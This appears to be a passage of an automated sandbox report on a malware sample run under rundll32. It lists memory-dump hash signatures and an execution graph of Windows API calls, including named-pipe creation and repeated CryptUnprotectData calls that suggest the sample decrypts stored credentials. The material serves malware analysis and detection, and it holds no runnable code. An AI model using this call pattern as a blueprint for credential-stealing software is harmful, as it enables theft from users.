                                                                                  • Opcode ID: 1c5f088dde0399ae8e859646b1c9f89bfc6a2d64b244fbc6929b096549376b95
                                                                                  • Instruction ID: f65836cfa71065a29a8f7addc0bbefdf032e8685ea4cb583737f51fa2046dc3f
                                                                                  • Opcode Fuzzy Hash: 1c5f088dde0399ae8e859646b1c9f89bfc6a2d64b244fbc6929b096549376b95
                                                                                  • Instruction Fuzzy Hash: CA01FC71506300DAE7308E56ED84B67BFD8DF41320F08C81AEC4C0A3C5D279A441C6B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ef7f6be7d2d458784cb0f0c49d23d32c6a1fb8bc1463e610b666507c90e6f731
                                                                                  • Instruction ID: 5e0edb7aaeaf04b8d459fcf2a02841be28831a26173c01ce4434e2715555ab46
                                                                                  • Opcode Fuzzy Hash: ef7f6be7d2d458784cb0f0c49d23d32c6a1fb8bc1463e610b666507c90e6f731
                                                                                  • Instruction Fuzzy Hash: C301D431B0011497EB18AA7AC5187AF7AE79FC8304F10847DD005BB390CFB56D0587E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.1366548681.000000000470D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0470D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_470d000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 20346f94e43ae4453fbd17ac45dc3ba773aa7f779d38a1655de71a6635cca5ec
                                                                                  • Instruction ID: b1cb5719ffa306bca687be0b71941aa03a1b6347b209a5e38b7b974be044718f
                                                                                  • Opcode Fuzzy Hash: 20346f94e43ae4453fbd17ac45dc3ba773aa7f779d38a1655de71a6635cca5ec
                                                                                  • Instruction Fuzzy Hash: A601407140E3C09ED7228B259C94A62BFB4DF53224F19C5CBD8888F297C2695849C772
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a015001f69d3eb4b559369356c068bd201a22478cf1f91c4f6627c6ab4e2e773
                                                                                  • Instruction ID: 9b894f270b1114a2a144a6b797d32d3fc16721096b8ba2cb37f1da261e9e7d67
                                                                                  • Opcode Fuzzy Hash: a015001f69d3eb4b559369356c068bd201a22478cf1f91c4f6627c6ab4e2e773
                                                                                  • Instruction Fuzzy Hash: E2F024397047A02BE7312A2A9540B2B7F4E6BC2174F49006AEE498B241DEA0EC0182E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7904b627c94814496669058ee395ed6092d6b901f6af9d5ea1f123769346c37c
                                                                                  • Instruction ID: 9592e09d0bf814b393d18184b04be022a718876ad1e512cd57a8b80686890945
                                                                                  • Opcode Fuzzy Hash: 7904b627c94814496669058ee395ed6092d6b901f6af9d5ea1f123769346c37c
                                                                                  • Instruction Fuzzy Hash: 2BF0A77630473053D724591796C4B7FA79FAFC8664F04803AEA0987290DEB4BD4196A4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b3751f5e17f2d67b5f2534e14d45fe2a34eb6cf9c89727935d0e76afb6b1cfa8
                                                                                  • Instruction ID: 620a57c81fdcee894679de30188decea72fcbbceecf157a5c64e647aec58eb73
                                                                                  • Opcode Fuzzy Hash: b3751f5e17f2d67b5f2534e14d45fe2a34eb6cf9c89727935d0e76afb6b1cfa8
                                                                                  • Instruction Fuzzy Hash: 97F082313012505B9311AA5EED98A9BBBDFEBC4664700853AF949DB304DFA1FC054BF0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8beed73e4f0cdc9f20b260b080da0560c9dec9470d472b0e6fde461774abd8c3
                                                                                  • Instruction ID: b60ee62cd2cf45e2b21fa2cb11618eed40a1c31cadc261978fa834a0c1c160bf
                                                                                  • Opcode Fuzzy Hash: 8beed73e4f0cdc9f20b260b080da0560c9dec9470d472b0e6fde461774abd8c3
                                                                                  • Instruction Fuzzy Hash: EAF082313012504B9311AA5EED9899BBBDFEBC4664700853AE949DB304DFA1EC0547E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 152257aa156eb3c73f4da4322ace6508d5caba724c2d2f28945f34a22cc4d42e
                                                                                  • Instruction ID: a5bac458afeb9107ed9c26c6768d21b8615dd1ca8319d2c4774a721cd74a6f39
                                                                                  • Opcode Fuzzy Hash: 152257aa156eb3c73f4da4322ace6508d5caba724c2d2f28945f34a22cc4d42e
                                                                                  • Instruction Fuzzy Hash: FAF0E521B046740BFB2819689A003966B8E5F46618F0040FBE545CBA93E5C0F94AA3A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1c0d9cef4765abe3b03beee566916c630fd1f0b75e3becbb667959bcdfec65ac
                                                                                  • Instruction ID: d983cd4510c6a670917cb3ced5a97afcbd7f0b2f98c41a86d2d9f924e18cc871
                                                                                  • Opcode Fuzzy Hash: 1c0d9cef4765abe3b03beee566916c630fd1f0b75e3becbb667959bcdfec65ac
                                                                                  • Instruction Fuzzy Hash: CBE0D87734A2901BC311959EBD99996BF5ED7D56713144173F648CB211DDE14C0287F0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6f02938226fc26268f1a290aff86a012a8c3cc50ee8dd3f76228c124ba20fb70
                                                                                  • Instruction ID: b85505194dd2c1226bb2405c2c1d8335eed5b8c5a8f539db07ad8c4601bf6024
                                                                                  • Opcode Fuzzy Hash: 6f02938226fc26268f1a290aff86a012a8c3cc50ee8dd3f76228c124ba20fb70
                                                                                  • Instruction Fuzzy Hash: D4E0223270A2404FD3109A6AE890656BBAAEBC922CB1144BEE40CCB382CD75CC07CBC0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f1d5d3883129449de044b4e3668ac218c324c65e05e027a4a3671c3b6f4ca739
                                                                                  • Instruction ID: 6e1b3c4b83b6e63941e968331bc6effb4a85a9aa61e7fd937c8b6073474b07dc
                                                                                  • Opcode Fuzzy Hash: f1d5d3883129449de044b4e3668ac218c324c65e05e027a4a3671c3b6f4ca739
                                                                                  • Instruction Fuzzy Hash: 98E0CD327112045FD314A96BE850A57F79EEBC9629B10447DF50CCB355CD72AC07CAD0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0d4a256ff8782ddcee9a17deb613d6dbf76e767ea9461a8cd528b7e7a862142e
                                                                                  • Instruction ID: 0f01062406a6eae2008cc9e3242b4c297d1f79b9601a3940f36b5b4a90a8758b
                                                                                  • Opcode Fuzzy Hash: 0d4a256ff8782ddcee9a17deb613d6dbf76e767ea9461a8cd528b7e7a862142e
                                                                                  • Instruction Fuzzy Hash: ECE0C272640638FBE7112A95A604BFB7F4BEB95374F008032FE0C46210CAB56990E7F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0231e693d22663c54ef834cb5318d83babbdcac8dcf4d33c2fa4a79e22998c3e
                                                                                  • Instruction ID: 3760b48ddd9156b6fa483314212cb96b4105d909c043ae86effe390f3a846c9f
                                                                                  • Opcode Fuzzy Hash: 0231e693d22663c54ef834cb5318d83babbdcac8dcf4d33c2fa4a79e22998c3e
                                                                                  • Instruction Fuzzy Hash: 72E0C27154A2864FCB138634A5965643B70FB52218B1505CAE84449407EA624957C391
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3ec07d83e38aec4a960749a0790caed5bdc9327e51568a5fff84db540d91af8c
                                                                                  • Instruction ID: d02120889926bcef401d4b1f464043c44b2d8d0cadbc6fd92e65c5fa69dccab6
                                                                                  • Opcode Fuzzy Hash: 3ec07d83e38aec4a960749a0790caed5bdc9327e51568a5fff84db540d91af8c
                                                                                  • Instruction Fuzzy Hash: 03D0A726A413385BD71026B992503E6B7DEEF89024F1144F7EB0DCB215EDE5AC0B93E8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 10a32a0d6423d20e01d30d4351f84cd440c4104cd6cc8bd93e24f4000cca7ce4
                                                                                  • Instruction ID: 5f5ae5918b12936f9c815fdb8678633391cc3db1c72bb509b6abc8307fec3c0a
                                                                                  • Opcode Fuzzy Hash: 10a32a0d6423d20e01d30d4351f84cd440c4104cd6cc8bd93e24f4000cca7ce4
                                                                                  • Instruction Fuzzy Hash: 69E02670906148EFCB00DFB4D951A9C7FF1EF0220470044E9E808DB252DA306F05D780
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5e63e7f5efb8b249f953431a9461d5e2d0dccd7264443535bc3c7c31b135c1c3
                                                                                  • Instruction ID: 8883238787137f31239c2ca7c410a1a8f175be136974552139fc61ad70705add
                                                                                  • Opcode Fuzzy Hash: 5e63e7f5efb8b249f953431a9461d5e2d0dccd7264443535bc3c7c31b135c1c3
                                                                                  • Instruction Fuzzy Hash: F6E02B3760C1945FD3061718F801BB57FA9975A220F0600A7F8818B3A3CD716C01D7E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d2b9a39ee40df5a28a8cb34a91676cc63f1df217b51a4ea9e3047b1e33023b6b
                                                                                  • Instruction ID: d3e623031d8455bfd2b917030c67ddbcc938ee024052ff95d72375a2dfd66f75
                                                                                  • Opcode Fuzzy Hash: d2b9a39ee40df5a28a8cb34a91676cc63f1df217b51a4ea9e3047b1e33023b6b
                                                                                  • Instruction Fuzzy Hash: E0D022CF90B2382BA701106A2A02287A70A4B86A2CF1608A3D51CC720244C5BC0152F2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f66a338608250fb4043c9d7dd66df811144a9a551836d57f3bbc9e79eec3da19
                                                                                  • Instruction ID: 1551d4fae9944f09d70e2f1f3f87746a25d85d73122faa2a92f8d41d62f14a80
                                                                                  • Opcode Fuzzy Hash: f66a338608250fb4043c9d7dd66df811144a9a551836d57f3bbc9e79eec3da19
                                                                                  • Instruction Fuzzy Hash: 43E0ECB1912108EBCB40DFA8EA4669D7BB6EB85204B1085A8D808A7200EE716E469B90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9106bbd0695b05e7c444d93f00c3f657f24108c775fb5be3670696b1ff579907
                                                                                  • Instruction ID: b0e6f9a183988be4c576a62ea4a4e046d37dc1f2b268dae0d5c64e2a3677dcf1
                                                                                  • Opcode Fuzzy Hash: 9106bbd0695b05e7c444d93f00c3f657f24108c775fb5be3670696b1ff579907
                                                                                  • Instruction Fuzzy Hash: 29D0227F7000204BD60CE675309417D630BE7E8123300C13BED06C2301EE388C175256
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b52b463bbb3f285e3564ebaddafc7abcd2c9b51f6543843e3a75592eb8bf6fdb
                                                                                  • Instruction ID: 287afd5c9e2e275730f8d6d9a21006a8b1d23888864aac8e15d9291f11c8a28e
                                                                                  • Opcode Fuzzy Hash: b52b463bbb3f285e3564ebaddafc7abcd2c9b51f6543843e3a75592eb8bf6fdb
                                                                                  • Instruction Fuzzy Hash: 2AD0A7323110286B52046659D98697EBB9AE7943603144433FA0187224DDB17C04A3D5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5af1996ca2171806b40a44a15f375df84845f4769c70f230f89ec6d0b45e3b08
                                                                                  • Instruction ID: de57b3929f39fd78693959bc8d52e8ad9749af3c46c8fc2fa76cb79e93def19d
                                                                                  • Opcode Fuzzy Hash: 5af1996ca2171806b40a44a15f375df84845f4769c70f230f89ec6d0b45e3b08
                                                                                  • Instruction Fuzzy Hash: BDD01270942109FF8B00DFA5D90565DBBF5EB44204B1085A9E808D7241DA716E049780
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0b85730b2cd2237fecb6bd7d10a835500e257228de577967d8a00a2f0bb26342
                                                                                  • Instruction ID: 0d9babaf41af086166bca23940506be40de7393b2275b7976eef51c750c07696
                                                                                  • Opcode Fuzzy Hash: 0b85730b2cd2237fecb6bd7d10a835500e257228de577967d8a00a2f0bb26342
                                                                                  • Instruction Fuzzy Hash: 17D0127090210CEFCB40DFA8DA0565D77F9EB44204F1085A8D808E7200DE316E009BD0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 162414b4f2e73658c371f3d68fbee19d5fc938c8f471174795d01f64b5c4ef4c
                                                                                  • Instruction ID: d08ebc5746132be34e179aac0f1b1bd589f43e54714e345cefe0cc17a035bfa2
                                                                                  • Opcode Fuzzy Hash: 162414b4f2e73658c371f3d68fbee19d5fc938c8f471174795d01f64b5c4ef4c
                                                                                  • Instruction Fuzzy Hash: FBC08C25B812188BEA102E7B231833A318EEBC0628F0488566A0E86008DDE8F8001248
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 87b20a890b61c255788aea5f7faad609ae8aca886fc812843c178af31d39db88
                                                                                  • Instruction ID: 4dec0b44331dd6a571623d917321ad7379783a14406da96f84a8a7a8ea93a7cb
                                                                                  • Opcode Fuzzy Hash: 87b20a890b61c255788aea5f7faad609ae8aca886fc812843c178af31d39db88
                                                                                  • Instruction Fuzzy Hash: 3FC08CB76949002FDB014664CC077C1BBF0EAA03143458072E091C2023E22D98138630
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c49f55b6f102e40b7b647f239833af0e2193c6908c5aa7a5732e56742dac4993
                                                                                  • Instruction ID: 368afbb0479c3f82330169e1d4cec1bd5bbe6b973ca52e834faa81363906bd3d
                                                                                  • Opcode Fuzzy Hash: c49f55b6f102e40b7b647f239833af0e2193c6908c5aa7a5732e56742dac4993
                                                                                  • Instruction Fuzzy Hash: 31B01286685010167100A6374AD457B40D3E6C0304BCCCC911101E001C5D68F0013004

                                                                                  Execution Graph

                                                                                  Execution Coverage:11.6%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:2.8%
                                                                                  Total number of Nodes:425
                                                                                  Total number of Limit Nodes:24
                                                                                  execution_graph 50321 50e0d4c 50322 50e08e0 50321->50322 50323 50e096d 50322->50323 50325 40666f0 50322->50325 50326 4066730 50325->50326 50329 4060510 50326->50329 50328 406674b 50328->50323 50330 4060513 50329->50330 50331 4060536 50330->50331 50334 50e1100 50330->50334 50338 50e10f0 50330->50338 50331->50328 50335 50e1112 50334->50335 50336 50e1135 50335->50336 50342 50e1140 50335->50342 50336->50331 50339 50e1112 50338->50339 50340 50e1135 50339->50340 50341 50e1140 3 API calls 50339->50341 50340->50331 50341->50340 50343 50e1168 50342->50343 50347 50e1369 50343->50347 50355 50e1370 50343->50355 50344 50e11a8 50344->50336 50348 50e1370 50347->50348 50349 50e1482 CreateNamedPipeW 50348->50349 50350 50e1418 50348->50350 50354 50e1549 50349->50354 50363 50e054c 50350->50363 50354->50344 50356 50e1397 50355->50356 50357 50e1482 CreateNamedPipeW 50356->50357 50358 50e1418 50356->50358 50362 50e1549 50357->50362 50359 50e054c CreateNamedPipeW 50358->50359 50360 50e1478 50359->50360 50360->50344 50362->50344 50364 50e1498 CreateNamedPipeW 50363->50364 50366 50e1478 50364->50366 50366->50344 50640 4a37490 50643 4a3749b 50640->50643 50644 4a38028 50640->50644 50655 4a38038 50640->50655 50646 4a38033 50644->50646 50645 4a38886 50648 4a38079 50645->50648 50651 4a3b3d6 5 API calls 50645->50651 50652 4a3b63a 5 API calls 50645->50652 50646->50645 50647 4a38826 50646->50647 50646->50648 50653 4a3b3d6 5 API calls 50646->50653 50666 4a3b63a 50646->50666 50674 50efe31 50647->50674 50678 50efe40 50647->50678 50648->50643 50651->50648 50652->50648 50653->50647 50657 4a38075 50655->50657 50656 4a38886 50659 4a38079 50656->50659 50664 4a3b3d6 5 API calls 50656->50664 50665 4a3b63a 5 API calls 50656->50665 50657->50656 50658 4a38826 50657->50658 50657->50659 50660 4a3b3d6 5 API calls 50657->50660 50661 4a3b63a 5 API calls 50657->50661 50662 50efe40 3 API calls 50658->50662 50663 50efe31 3 API calls 50658->50663 50659->50643 50660->50658 50661->50658 50662->50656 50663->50656 50664->50659 50665->50659 50667 4a3b4a9 50666->50667 50668 4a3b669 50667->50668 50669 4a3e5e7 CreateFileA 50667->50669 50670 4a3ec76 CreateFileA 50667->50670 50671 4a3e308 5 API calls 50667->50671 50672 4a3e358 5 API calls 50667->50672 50673 4a3ec7f CreateFileA 50667->50673 50668->50647 50669->50667 50670->50667 50671->50667 50672->50667 50673->50667 50675 50efe3b 50674->50675 50682 107fd9f 50675->50682 50679 50efe6c 50678->50679 50681 107fd9f 3 API calls 50679->50681 50680 50eff17 50681->50680 50683 107fda3 50682->50683 50685 107f941 3 API calls 50683->50685 50686 107f950 3 API calls 50683->50686 50684 107fdf8 50685->50684 50686->50684 50523 50e22a8 50524 50e22ea 50523->50524 50525 50e22f0 WaitNamedPipeW 50523->50525 50524->50525 50526 50e2324 50525->50526 50687 50e2d78 50688 50e2d8a 50687->50688 50689 50e2dce 50688->50689 50691 50e3293 50688->50691 50693 50e32a7 50691->50693 50692 50e3660 50693->50692 50696 1077481 50693->50696 50701 1077490 50693->50701 50697 10774ba 50696->50697 50698 10774d5 50697->50698 50699 107f941 3 API calls 50697->50699 50700 107f950 3 API calls 50697->50700 50698->50693 50699->50698 50700->50698 50703 10774ba 50701->50703 50702 10774d5 50702->50693 50703->50702 50704 107f941 3 API calls 50703->50704 50705 107f950 3 API calls 50703->50705 50704->50702 50705->50702 50706 5da0eac 50707 5da08d1 50706->50707 50709 5da25a8 50707->50709 50710 5da2600 50709->50710 50711 5da264a 50710->50711 50712 5da2b7a 50710->50712 50714 5da26d6 50711->50714 50715 5da25a8 CryptUnprotectData 50711->50715 50719 5da2bb8 50711->50719 50723 4a36ea8 50712->50723 50729 4a36e98 50712->50729 50713 5da2bdc 50713->50707 50714->50707 50715->50714 50721 4a36ea8 CryptUnprotectData 50719->50721 50722 4a36e98 CryptUnprotectData 50719->50722 50720 5da2bdc 50720->50714 50721->50720 50722->50720 50724 4a36ec7 50723->50724 50725 4a36ed3 50723->50725 50724->50713 50735 5da2bf0 50725->50735 50743 5da2be1 50725->50743 50726 4a36f4f 50726->50713 50730 4a36ed3 50729->50730 50731 4a36ec7 50729->50731 50733 5da2bf0 CryptUnprotectData 50730->50733 50734 5da2be1 CryptUnprotectData 50730->50734 50731->50713 50732 4a36f4f 50732->50713 50733->50732 50734->50732 50736 5da2c15 50735->50736 50739 5da2cc9 50735->50739 50736->50739 50740 5da2bf0 CryptUnprotectData 50736->50740 50742 5da2be1 CryptUnprotectData 50736->50742 50751 5da2dd1 50736->50751 50755 5da0674 50739->50755 50740->50739 50742->50739 50744 5da2bea 50743->50744 50745 5da2cc9 50744->50745 50748 5da2bf0 CryptUnprotectData 50744->50748 50749 5da2dd1 CryptUnprotectData 50744->50749 50750 5da2be1 CryptUnprotectData 50744->50750 50746 5da0674 CryptUnprotectData 50745->50746 50747 5da2e94 50746->50747 50747->50726 50748->50745 50749->50745 50750->50745 50752 5da2de5 50751->50752 50753 5da0674 CryptUnprotectData 50752->50753 50754 5da2e94 50753->50754 50754->50739 50756 5da2eb0 CryptUnprotectData 50755->50756 50757 5da2e94 50756->50757 50757->50726 50758 50e1eb8 50759 50e1f0c ConnectNamedPipe 50758->50759 50760 50e1f48 50759->50760 50761 10736b0 50762 10736c6 50761->50762 50763 1073764 50762->50763 50766 107e5f8 50762->50766 50764 1073739 50767 107e634 50766->50767 50769 107e64e 50766->50769 50767->50769 50774 107eab8 50767->50774 50778 107eac8 50767->50778 50768 107e694 50782 4060ba2 50768->50782 50785 4060bb0 50768->50785 50769->50764 50775 107eaee 50774->50775 50776 107eb26 50775->50776 50788 107eb70 50775->50788 50776->50768 50780 107eaee 50778->50780 50779 107eb26 50779->50768 50780->50779 50781 107eb70 3 API calls 50780->50781 50781->50779 50814 4060be0 50782->50814 50783 4060bd5 50783->50769 50786 4060bd5 50785->50786 50787 4060be0 CryptProtectData 50785->50787 50786->50769 50787->50786 50789 107ebae 50788->50789 50796 107f798 50789->50796 50801 107f7a8 50789->50801 50790 107ee4f 50791 107edd7 50791->50790 50806 40609c2 50791->50806 50810 4060a08 50791->50810 50797 107f7a8 50796->50797 50798 107f81b 50797->50798 50799 107f941 3 API calls 50797->50799 50800 107f950 3 API calls 50797->50800 50798->50791 50799->50798 50800->50798 50802 107f7cc 50801->50802 50803 107f81b 50802->50803 50804 107f941 3 API calls 50802->50804 50805 107f950 3 API calls 50802->50805 50803->50791 50804->50803 50805->50803 50807 40609cf 50806->50807 50808 4060510 3 API calls 50807->50808 50809 4060a45 50808->50809 50809->50791 50811 4060a2d 50810->50811 50812 4060510 3 API calls 50811->50812 50813 4060a45 50812->50813 50813->50791 50815 4060c0d 50814->50815 50816 4060c19 50814->50816 50815->50783 50819 40611f8 50816->50819 50820 406121d 50819->50820 50823 40612e4 50819->50823 50820->50823 50826 40611f8 CryptProtectData 50820->50826 50827 40614b3 50820->50827 50831 406144f 50820->50831 50835 4060f08 50823->50835 50826->50823 50828 40614d5 50827->50828 50829 4060f08 CryptProtectData 50828->50829 50830 406150d 50829->50830 50830->50823 50832 4061463 50831->50832 50833 4060f08 CryptProtectData 50832->50833 50834 406150d 50833->50834 50834->50823 50836 40616f8 CryptProtectData 50835->50836 50838 4060c95 50836->50838 50838->50783 50371 4a378b8 50372 4a378e1 50371->50372 50373 4a37941 50372->50373 50377 5da961f 50372->50377 50383 5da95e0 50372->50383 50388 5da95d2 50372->50388 50378 5da95e8 50377->50378 50380 5da9623 50377->50380 50393 5da891d 50378->50393 50397 5da96d0 50378->50397 50379 5da961a 50379->50372 50380->50372 50384 5da95f1 50383->50384 50386 5da891d 5 API calls 50384->50386 50387 5da96d0 5 API calls 50384->50387 50385 5da961a 50385->50372 50386->50385 50387->50385 50389 5da95e0 50388->50389 50391 5da891d 5 API calls 50389->50391 50392 5da96d0 5 API calls 50389->50392 50390 5da961a 50390->50372 50391->50390 50392->50390 50394 5da893d 